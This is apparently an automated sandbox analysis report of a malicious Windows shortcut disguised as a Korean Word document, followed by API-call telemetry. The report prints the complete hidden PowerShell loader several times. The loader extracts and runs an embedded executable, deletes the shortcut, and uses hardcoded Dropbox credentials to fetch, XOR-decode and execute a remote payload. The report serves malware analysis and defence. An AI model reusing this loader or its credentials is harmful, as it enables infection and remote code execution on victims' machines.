Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 15, 2024, 4:54 p.m.	July 15, 2024, 4:59 p.m.

Size	1.0MB
Type	MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Sun Dec 31 15:32:08 1600, mtime=Sun Dec 31 15:32:08 1600, atime=Sun Dec 31 15:32:08 1600, length=0, window=hidenormalshowminimized
MD5	`16074a3f76b7860a180e0ec54dd19ed6`
SHA256	`e936445935c4a636614f7113e4121695a5f3e4a6c137b7cdcceb6f629aa957c4`
CRC32	`25B0703B`
ssdeep	`768:YGNrKmRN73ExbcrYcWYF55GYAtGMu6YD5:YGNrKmRN73ExbcrSYF55TcGD6YD5`
Yara	lnk_file_format - Microsoft Windows Shortcut File Format Lnk_Format_Zero - LNK Format

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "cgugMdqbYP" "C:\Users\test22\AppData\Local\Temp\멀티캠퍼스 강연의뢰서_ 김병로 교수님 .docx.lnk"
3048
- cmd.exe "C:\Windows\system32\cmd.exe" /c powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
  1784
  - powershell.exe powershell -windowstyle hidden -nop -NoProfile -NonInteractive -c "$tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;foreach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Object System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]::Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file,0,$file.Length);$InputStream.Dispose();write-host \"readfileend\";$path = $lnkpath.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = 1062657;$temp = New-Object Byte[]($len2-$len1);write-host \"exestart\";for($i=$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$temp) -Encoding Byte;write-host \"exeend\";$temp = New-Object Byte[]($file.Length-$len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath);Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int[]] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_state = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1)) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) -shl $j));}} return $len } $clientID = \"x2f7205ajf3knq9\";$clientSecret = \"mz2vl6yajc2rpy2\";$refreshToken = \"1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1v4slGa\";$body = @{grant_type=\"refresh_token\";refresh_token=$refreshToken;client_id=$clientID;client_secret=$clientSecret};$tokenEndpoint = \"https://api.dropboxapi.com/oauth2/token\";$response = Invoke-RestMethod -Uri $tokenEndpoint -Method Post -Body $body;if ($response.access_token) {$accessToken = $response.access_token;}$downloadUrl = \"https://content.dropboxapi.com/2/files/download\";$remoteFilePath = \"/0528/ps.bin\";$request = [System.Net.HttpWebRequest]::Create($downloadUrl);$request.Method = \"POST\";$request.Headers.Add(\"Authorization\", \"Bearer $accessToken\");$request.Headers.Add(\"Dropbox-API-Arg\", '{\"path\": \"' + $remoteFilePath + '\"}');$response = $request.GetResponse();$receiveStream = $response.GetResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object System.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.MemoryStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream.Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_bytes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStream.Close();$response.Close();"
    2356

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW July 15, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 15, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 15, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 15, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA July 15, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW July 15, 2024, 4:54 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 15, 2024, 4:54 p.m.			0	0

Command line console output was observed (46 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: You must provide a value expression on the right-hand side of the '-' operator. console_handle: 0x00000023	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: At line:1 char:1724 console_handle: 0x0000002f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: + $tmp = 'C:\Users\test22\AppData\Local\Temp';$lnkpath = Get-ChildItem *.lnk;fo console_handle: 0x0000003b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: reach ($path in $lnkpath) { if ($path.length -eq 0x00103CFB) { $lnkpath = $path console_handle: 0x00000047	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ;}}foreach ($item in $lnkpath) { $lnkpath = $item.Name;}$InputStream = New-Obje console_handle: 0x00000053	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ct System.IO.FileStream($lnkpath, [IO.FileMode]::Open, [System.IO.FileAccess]:: console_handle: 0x0000005f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: Read);$file=New-Object Byte[]($InputStream.length);$len=$InputStream.Read($file console_handle: 0x0000006b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ,0,$file.Length);$InputStream.Dispose();write-host "readfileend";$path = $lnkpa console_handle: 0x00000077	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: th.substring(0,$lnkpath.length-4);$len1 = 1057132;$len2 = 1062657;$len3 = console_handle: 0x00000083	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: 1062657;$temp = New-Object Byte[]($len2-$len1);write-host "exestart";for($i console_handle: 0x0000008f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: =$len1; $i -lt $len2; $i++) { $temp[$i-$len1] = $file[$i]};sc $path ([byte[]]$t console_handle: 0x0000009b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: emp) -Encoding Byte;write-host "exeend";$temp = New-Object Byte[]($file.Length- console_handle: 0x000000a7	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: $len3);for($i=$len3; $i -lt $file.Length; $i++) { $temp[$i-$len3] = $file[$i]}; console_handle: 0x000000b3	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: $encData_b64 = Start-Process -FilePath $path;[System.IO.File]::Delete($lnkpath console_handle: 0x000000bf	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: );Function Decode-Binary { param( [Parameter(Position = 0, Mandatory = $True)] console_handle: 0x000000cb	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: [byte[]] $binary,[Parameter(Position = 1, Mandatory = $True)] [long] $len) [int console_handle: 0x000000d7	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: []] $poly = @(0, 3, 29, 37, 73);$poly_n = 4;$poly_ord = 73; [byte[]] $ran_stat console_handle: 0x000000e3	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: e = New-Object byte[] ($poly_ord + 1);for ($i = 0; $i -lt $poly_ord + 1; $i++){ console_handle: 0x000000ef	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: $ran_state[$i] = 1; if ($i -lt $len){ $ran_state[$i] = [byte](($len % ($i + 1 console_handle: 0x000000fb	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: )) -band 1);}}for ($i = 0; $i -lt $len; $i++) { for ($j = 1; $j -lt $poly_n; $j console_handle: 0x00000107	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ++) { $ran_state[$i % $poly_ord] = $ran_state[$i % $poly_ord] -bxor $ran_state[ console_handle: 0x00000113	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ($i + $poly[$j]) % $poly_ord]; } for ($j = 0; $j -lt 8; $j++) { $binary[$i] = console_handle: 0x0000011f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: $binary[$i] -bxor [byte]((($ran_state[$j] -bxor ($ran_state[($i * ($j + 1)) % $ console_handle: 0x0000012b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: poly_ord] -band $ran_state[(($i + $j) * ($j + 1)) % $poly_ord])) - <<<< shl $j) console_handle: 0x00000137	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: );}} return $len } $clientID = "x2f7205ajf3knq9";$clientSecret = "mz2vl6yajc2rp console_handle: 0x00000143	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: y2";$refreshToken = "1G9ctDOJDPUAAAAAAAAAAZYmjGqbo7QXmh9lu_K5JcgYq7UVVP5hXcGJn1 console_handle: 0x0000014f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: v4slGa";$body = @{grant_type="refresh_token";refresh_token=$refreshToken;client console_handle: 0x0000015b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: _id=$clientID;client_secret=$clientSecret};$tokenEndpoint = "https://api.dropbo console_handle: 0x00000167	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: xapi.com/oauth2/token";$response = Invoke-RestMethod -Uri $tokenEndpoint -Metho console_handle: 0x00000173	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: d Post -Body $body;if ($response.access_token) {$accessToken = $response.access console_handle: 0x0000017f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: _token;}$downloadUrl = "https://content.dropboxapi.com/2/files/download";$remot console_handle: 0x0000018b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: eFilePath = "/0528/ps.bin";$request = [System.Net.HttpWebRequest]::Create($down console_handle: 0x00000197	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: loadUrl);$request.Method = "POST";$request.Headers.Add("Authorization", "Bearer console_handle: 0x000001a3	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: $accessToken");$request.Headers.Add("Dropbox-API-Arg", '{"path": "' + $remoteF console_handle: 0x000001af	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ilePath + '"}');$response = $request.GetResponse();$receiveStream = $response.G console_handle: 0x000001bb	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: etResponseStream();if ($receiveStream -ne $null) {$streamReader = New-Object Sy console_handle: 0x000001c7	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: stem.IO.StreamReader($receiveStream);$memoryStream = New-Object System.IO.Memor console_handle: 0x000001d3	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: yStream;$buffer = New-Object byte[] 1024;$read = 0;do { $read = $receiveStream. console_handle: 0x000001df	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: Read($buffer, 0, $buffer.Length);$memoryStream.Write($buffer, 0, $read);} while console_handle: 0x000001eb	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ($read -gt 0);$enc_bytes = $memoryStream.ToArray();Decode-Binary ($enc_bytes) console_handle: 0x000001f7	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ($enc_bytes.Length);$newString = [System.Text.Encoding]::UTF8.GetString($enc_by console_handle: 0x00000203	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: tes);iex $newString;$memoryStream.Close();$streamReader.Close();};$receiveStrea console_handle: 0x0000020f	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: m.Close();$response.Close(); console_handle: 0x0000021b	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordEx console_handle: 0x00000227	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: ception console_handle: 0x00000233	1	1
WriteConsoleW July 15, 2024, 4:54 p.m.	buffer: + FullyQualifiedErrorId : ExpectedValueExpression console_handle: 0x0000023f	1	1

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683838 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ff8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ef8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006838f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006838f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006838f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683af8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x00683ab8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006841f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006834b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006834b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006834b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006834b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006834b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 15, 2024, 4:54 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006834b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 15, 2024, 4:54 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 145 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02890000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73921000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73922000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01fe2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0205a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01ff4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0206b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02067000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 15, 2024, 4:54 p.m.	process_identifier: 2356 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01feb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
